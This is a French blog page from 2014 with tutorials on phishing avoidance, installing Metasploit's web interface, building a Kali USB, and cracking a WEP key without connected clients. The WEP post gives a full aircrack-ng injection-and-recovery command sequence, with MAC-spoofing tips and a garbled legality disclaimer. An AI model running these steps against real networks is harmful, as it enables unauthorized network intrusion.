mercredi 9 juillet 2014

Comment ne pas se faire pirater sa boite mail ?

14:55 Posted by gamaran , No comments

La nouveauté en terme de cyberattaque ? Le pishing. Cette technique de piratage consiste en premier lieu à usurper l'identité d'une personne via la boîte mail. Une fois l'acte accompli, ils achetent des produits (chers) sur internet et se font passer pour la personne usurpée auprès des contacts mails. Au terme, la victime et ses contacts se font hacker. Cybercriminel : 1 / victime : 0.

Pour éviter ce cas de figure, une notion centrale est à aborder : la liste blanche. En terme informatique, la liste blanche est l'ensemble des données importantes de l'utilisateur. Comme sa liste de contacts et d'adresses mails. Le but de cette liste est la bonne réception des mails les plus utiles. Néanmoins, si un utilisateur reçoit un mail d'un de ses contacts victimes de pishing, il ne pourra rien faire. Ainsi, voici quelques points à respecter afin de préserver la liste blanche contre le pishing.

1. Ne pas ajouter son adresse mail dans sa liste blanche. S'envoyer un mail à partir de son adresse mail est une pratique peu commune. Dans le doute, mieux vaut laisser le filtre anti-spam jouer son rôle.

2. Ne pas donner un nom de rubrique trop explicite à sa liste blanche. Eviter les @orange, @shopping.com car aucun e-mail provenant de cette rubrique ne sera filtrés par l'outil anti-spam. C'est une porte ouverte au pishing.

3. Ne pas cliquer sur un mail aguicheur d'un expéditeur important (la banque, l'opérateur téléphonique). Il vaut mieux copier l'adresse sur internet pour voir où cela mène. Petite astuce en plus : en cas de soucis, la banque préfère le coup de téléphone  au message électronique.

4. Verifier que les liens d'adresse soient en "https" et non en "http". C'est la première garantie la sécurité du site. Toutefois, les adeptes du pishing se mettent aux URL "https".

5. Se mefier des mails suspects contenant des caractères spéciaux et des fautes d'orthographes grossières. Par exemple : "Bonjours Madame Dupont. voici votre @ttestation, cli_quez ici pour l'a recevoir #"

6. Pour vérifier une URL, passer la souris sur le lien sans cliquer et regarder l'adresse qui s'affiche en bas à gauche. S'il s'agit bien d'un spam, l'URL n'a aucune relation avec la banque ou l'entreprise dont le mail émanerait.

dimanche 6 juillet 2014

[Tuto]Utiliser metasploit web browser sous Kali-Linux 1.0

13:56 Posted by gamaran , , , No comments
== Description ==
Metasploit est un projet open source à l'origine développé en collaboration avec Rapid7 qui fournit des informations et des outils de pénétrations.
Il compte plus de 1000 exploits et 200 payloads et est entièrement écrit en ruby.
== Pré-requis ==
Etre root et pouvoir ajouter une exeption pour le certificat https sur iceweasel
Avoir la clé du produit.
== Installation ==
Lancez
le navigateur via le raccourcis depuis le menu "Applications -> Kali Linux -> Exploitation Tools -> Metasploit -> Metasploit community / pro"
http://pix.toile-libre.org/upload/img/1364751668.png
Une fois le navigateur ouvert cliquez sur le lien en bas de la page.
http://pix.toile-libre.org/upload/img/1364751931.png
Ajouter l'exception pour le certificat https afin de pouvoir accéder à la page d'installation de Metasploit.
http://pix.toile-libre.org/upload/img/1364752118.png
Et confirmer l'exception.
http://pix.toile-libre.org/upload/img/1364752167.png
L'installation prend environ 5 minutes profitez-en pour prendre une petit café ;-)
http://pix.toile-libre.org/upload/img/1364752296.png
Ensuite créez un utilisateur, personnellement en environnement de pentest, je prend root comme le nom d'utilisateur de la session.
http://pix.toile-libre.org/upload/img/1364752405.png
Il vous sera demandé de choisir un mot de passe robuste contenant au moins 8 caractères comprenant des chiffres des lettres et des  caractères spéciaux, sinon vous aurez ce message d'erreur.
http://pix.toile-libre.org/upload/img/1364752506.png
Puis vient le moment d'entrer votre clé de produit, si vous n'en n'avez pas, cliquez sur "GET PRODUCT KEY".
http://pix.toile-libre.org/upload/img/1364752603.png
Si c'est le cas vous avez le choix entre une version d’essais pro ou la free community.
http://pix.toile-libre.org/upload/img/1364752844.png
Il vous sera malheureusement demandé des information personnelles, sur lesquelles pour la version free j'ai menti en dehors de l'adresse mail qui est bien valide.
http://pix.toile-libre.org/upload/img/1364752938.png
Le mail qui vous servira à récupérer votre clé de produit à rentrer sur la page d'accès.
http://pix.toile-libre.org/upload/img/1364753064.png
Une fois la clé de produit rentrée, vous voilà dans la page d'accueil de Metasploit, l'installation est à présent terminée.
http://pix.toile-libre.org/upload/img/1364753130.png
== Utilisation de base ==
Une fois sur la page d'accueil, cliquez sur défault, ensuite sur scan pour tester des cibles potentielles sur le réseau local.
http://pix.toile-libre.org/upload/img/1364753258.png
Entrez l'adresse de la cible à tester.
http://pix.toile-libre.org/upload/img/1364753319.png
Laisser le scan se terminer, cela peut prendre quelques minutes, l'outil utilisant succèssivement des outils de scan tel que nmap etc...
http://pix.toile-libre.org/upload/img/1364753415.png
Une fois le scan terminé, un rapport détaillé s'affiche, ici la cible l'hôte de la machine virtuelle ou est utilisé kali est sécurisé à première vue.
http://pix.toile-libre.org/upload/img/1364753517.png
Pour des test plus poussé, il vous faudra attendre que je connaisse mieux l'outil en question, et que j'installe une metasploitable afin de pouvoir en faire un usage plus poussé.
== Voir aussi ==
** ( anglais ) ** http://www.metasploit.com/
Source : Coyotus Dot Com

[Tuto]Création d'une clé usb kali live et/ou persistante

13:51 Posted by gamaran , , , No comments
Bonjour à tous, voici un tutoriel sur la création d'une clé usb kali bootable, ainsi que comment transformer la clé usb live en persistante.Ces opérations peuvent être effectué sur n'importe quel distribution linux.
Pré-requis:
-Avoir les droit root(ou sudoers)
-Avoir l'iso de kali-linux(voir le post à ce sujet si vous ne savez pas ou le télécharger)
-Avoir une clé usb (min. 4gig pour Live et 16 gig pour persistante)
Première étape, création de la clé usb:
Insérez la clé usb dans l'ordinateur, et vérifier le path du device(ex.: /dev/sdb) à l'aide de la commande suivante;
dmesg
vous devriez avoir les indication suivante:
[   92.065290] sd 4:0:0:0: Attached scsi generic sg3 type 0
[   92.078678] sd 4:0:0:0: [sdc] 7835648 512-byte logical blocks: (4.01 GB/3.73 GiB)
[   92.086296] sd 4:0:0:0: [sdc] Write Protect is off
[   92.086300] sd 4:0:0:0: [sdc] Mode Sense: 23 00 00 00
[   92.093874] sd 4:0:0:0: [sdc] No Caching mode page present
[   92.093877] sd 4:0:0:0: [sdc] Assuming drive cache: write through
[   92.138907] sd 4:0:0:0: [sdc] No Caching mode page present
[   92.138911] sd 4:0:0:0: [sdc] Assuming drive cache: write through
[   92.146281]  sdc: sdc1
[   92.193864] sd 4:0:0:0:[sdc] No Caching mode page present
[   92.193868] sd 4:0:0:0: [sdc] Assuming drive cache: write through
[   92.193871] sd 4:0:0:0: [sdc] Attached SCSI removable disk
dans l'exemple ci dessus, la clé ce situe donc sur /dev/sdc.
*****ATTENTION, IL EST IMPORTANT DE NE PAS SE TROMPER CAR  ENTRER LE MAUVAIS CHEMIN POURRAIS AVOIR POUR EFFETS LA SUPPRESSION DE LA MAUVAISE CLÉ USB, OU PIRE D'UN DISQUE DUR*****
Maintenant, nous allons créer la clé usb Live à l'aide de la commande dd, dans l'example qui suit, remplacer /path/to/image-kali.iso par le path vers l'iso que vous avez téléchargé et /dev/sdc par le path de votre clé usb.
dd if=/path/to/image-kali.iso of=/dev/sdc bs=512k
La commande prends plusieurs minute à s'exécuter, et il n'y as pas de progression donc soyez patient et attendez la fin.
Félicitation, vous disposez maintenant d'une clé usb Live de Kali-Linux. Si vous désirez une clé persistante vous pouvez passer à l'étape suivante sinon votre lecteur peut s'arrêter ici.
Deuxième étape, création de la persistance:
À l'aide d'un logiciel de partionnements,(ex.: Gparted) créer une partition primaire formater en ext4 sur l'espace restant de la clé. *****Cette partition doit avoir pour nom(Label) persistence*****
Une fois la partition créer, vous aller monter la partition et créer un fichier nommé persistence.conf à la racine de la partition. Ce fichier doit contenir la ligne suivante :
/ union
Vous possédez maintenant une clé usb persitante.
Dernière étape, booter en mode persistence:
Lorsque vous booter sur votre clé usb, appuyez sur la touche tab lorsque vous atteignez le boot menu et ajouter persistence à la fin de la ligne de code:
ex.:http://docs.kali.org/wp-content/uploads/2013/01/usb-persistence.png
Cette manipulation doit être fait à chaque démarrage, sinon vous serez en mode Live.

[Tuto] Crack clé WEP sans client

13:44 Posted by gamaran , , , , 1 comment
Petit rappel :  il est illégal de s'attaquer à un réseau sans-fils donc nous n'avons pas l'autorisation EXPLICITE du propriétaire.
Bonjour tout le monde(bonjour docteur nick)
Lorsque l'on veut tester la sécurité d'un réseau wep, il arrive que l'on aie pas la chance de trouver une station connecté. Alors je vais vous montrer comment faire pour cracker une clé WEP quand il n'y a aucun client de connecté. Je vous conseille le terminal terminator pour la procédure puisqu'il vous permet d'avoir plusieurs terminaux dans une même fenêtre.Sinon vous n'aurez qu'à ouvrir plusieur terminaux.
Pré-requis:
-La suite aircrack d'installé:
-Une carte wifi compatible avec le monitoring ET l'injection de packet;
-Une bonne dose de patience.
Informations de base:
Voici les informations de base que je vais utiliser pour mon tutoriel, il se peut que ce ne soit pas identique chez vous, mais sa devrait être assez semblable pour que vous vous retrouviez.
-La carte sans fils est sur l'interface wlan1;
-L’adresse mac de la carte est le 00:1b:b1:82:10:f6(adresse fictive);
-L'adresse mac de l'access point(routeur) est le 00:26:50:4f:37:39(adresse fictive);
-Le channel de l'acces point est 11;
Nous pouvons donc commencer.
Nous allons commencer par démarrer notre carte wifi en mode monitoring:
 airmon-ng start wlan1
Une fois la commande exécuté, nous avons une nouvelle interface (mon0) que nous allons utiliser pour nos attaques.
Nous allons donc monitorer notre access point dans le but de capturer les packets ivs pour cracker ensuite la clé, ainsi que l'activité qui s'y déroule.
airodump-ng --bssid 00:26:50:4f:37:39 -h  00:1b:b1:82:10:f6 --channel 11 -w monFichier --ivs mon0
Explications:
-bssid: l'adresse mac de l'access point;
-h : notre adresse mac(vous pouvez utiliser une adresse mac fictive, ou d'une station connu pour masquer la votre);
--channel : le channel sur lequel l'access point écoute;
-w monFichier: on va enregistrer les packets capturer dans monFichier;
--ivs: capturer seulement les ivs(ce sont les packets qui nous intéresse ici);
mon0 : notre interface;
Dans un nouveau terminal, nous allons maintenant lancé une attack de fake authentification, pour faire croire à l'access point que nous somme connecté sur lui.
 aireplay-ng -1 0 -a 00:26:50:4f:37:39 -h 00:1b:b1:82:10:f6 mon0
Explications:
-1 : Attack par fake authentification(avec l'option 0 pour dire tant que la procédure n'est pas complété tu réesseye);
-a : mac adresse de l'access point;
Une fois que l'attaque est réussi, vous verrez dans le premier terminal qui capture nos données, que notre adresse mac apparait dans la liste des stations connecté.
Maintenant, nous allons esseyer de capturer le keystream à l'aide de l'attack fragmentation.
aireplay-ng -5 -b 00:26:50:4f:37:39 -h 00:1b:b1:82:10:f6 mon0
L’attaque va lire les packet et esseye d'en trouver un que nous pourrons modifier et réinjecter par la suite. Lorsqu'il aura trouver un packet, il devra capturer des données pour avoir assez d'informations pour obtenir un keystream valide. Voici la question qu'il devrait vous poser:
         Size: 114, FromDS: 1, ToDS: 0 (WEP)
         
         BSSID  =  00:14:6C:7E:40:80
         Dest. MAC  =  01:00:5E:00:00:FB
         Source MAC  =  00:40:F4:77:E5:C9
         
         0x0000:  0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@.
         0x0010:  0040 f477 e5c9 6052 8c00 0000 3073 d265  .@.w..`R....0s.e
         0x0020:  c402 790b 2293 c7d5 89c5 4136 7283 29df  ..y.".....A6r.).
         0x0030:  4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b  N.^._CO..7?.M..;
         0x0040:  8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5  .DX...z.+.>...O.
         0x0050:  4563 906d 0d90 88c4 5532 a602 a8ea f8e2  Ec.m....U2......
         0x0060:  c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1  .1..+(...."m.qj.
         0x0070:  9c9f                                     ..
         
         Use this packet ? 
On répond oui(y), et on appuye sur enter. L'attaque va esseyer de capturer un keystream valide.
Lorsque l'attaque aura réussi, vous aurez une réponse semblable à :
 Saving chosen packet in replay_src-0203-180328.cap
 Data packet found!
 Sending fragmented packet
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 384 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 1500 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-0203-180343.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Si l'attaque échoue, elle cherchera un nouveau paquet pour essayer à nouveau.
Maintenant que nous avons un keystream valide, stocker dans le fichier fragment-0203-180343.xor, nous pouvons forger un packet que nous injecterons pour faire monter les ivs.
packetforge-ng -0 -a 00:26:50:4f:37:39 -h  00:1b:b1:82:10:f6 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arpRequest
Explications:
-0 : construire un packet ARP;
-k : mac adresse de destination(broadcast dans notre cas);
-l : mac adresse source(broadcast dans notre cas);
-y : fichier source contenant notre keystream;
-w :  écrire notre packet dans arpRequest;
Maintenant que nous avons notre packet, nous allons l'injecter pour faire augementer nos ivs.
aireplay-ng -2 -b 00:26:50:4f:37:39 -h 00:1b:b1:82:10:f6 -r arpRequest mon0
Explications:
-2 : attaque par injection de packets;
-r : packet à injecter;
Maintenant que nos ivs augmente, dans un troisième terminal, nous allons lancer aircrack qui tentera de décrypter notre clé(au format hexadecimal).
aircrack-ng monFichier-01.ivs
Aircrack prends en options le fichier créer par airodump, qui rajoute automatiquement -01.ivs(puisque nous capturons seulement les ivs) à la fin du fichier.Si vous relancer votre commande airodump plus d'une fois, le 01 va augmenter de 1 à chaque fois.
Si aircrack échoue à décrypter la clé,ce qui arrivera au début car nous n'avons pas assez de packets ivs de capturé, il va attendre la prochaine tranche de 5000 ivs et automatiquement, réessayer de cracker la clé. Il suffit d'attendre patiemment que la commande se termina d'elle même avec une jolie clé en format hexadécimal comme cadeau.Une fois que nous avons la clé, vous pouvez fermer les autres terminaux, ou faire ctrl+c dans chaque terminal pour stopper les commandes.
Et voilà ce n'était pas plus compliqué que sa. Si vous avez des question n'hésiter pas.
Si vous voulez utiliser la clé hexadécimal pour vous connecter au réseau, pensez à enlever les : qu'elle contient pour garder uniquement les chiffres.